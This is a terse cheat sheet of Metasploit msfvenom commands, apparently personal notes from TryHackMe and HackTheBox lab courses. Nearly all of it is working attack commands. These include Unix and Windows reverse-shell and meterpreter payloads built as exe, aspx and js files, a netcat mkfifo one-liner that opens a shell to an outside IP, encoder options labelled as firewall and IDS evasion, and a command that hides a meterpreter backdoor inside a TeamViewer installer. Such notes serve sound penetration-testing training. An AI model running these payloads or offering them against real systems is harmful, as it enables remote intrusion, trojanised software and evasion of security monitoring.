Msfvenom
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
#result
mkfifo /tmp/kdyog; nc 10.9.135.209 4444 0</tmp/kdyog | /bin/sh >/tmp/kdyog 2>&1; rm /tmp/kdyog
tryhackme - common linux privsec
msfvenom --list=formats
msfvenom -l payloads
msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.9.193.229 LPORT=4444 -f exe -o reverse.exe
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5
hackthebox academy - metasploit (Firewall and IDS/IPS Evasion)
Last updated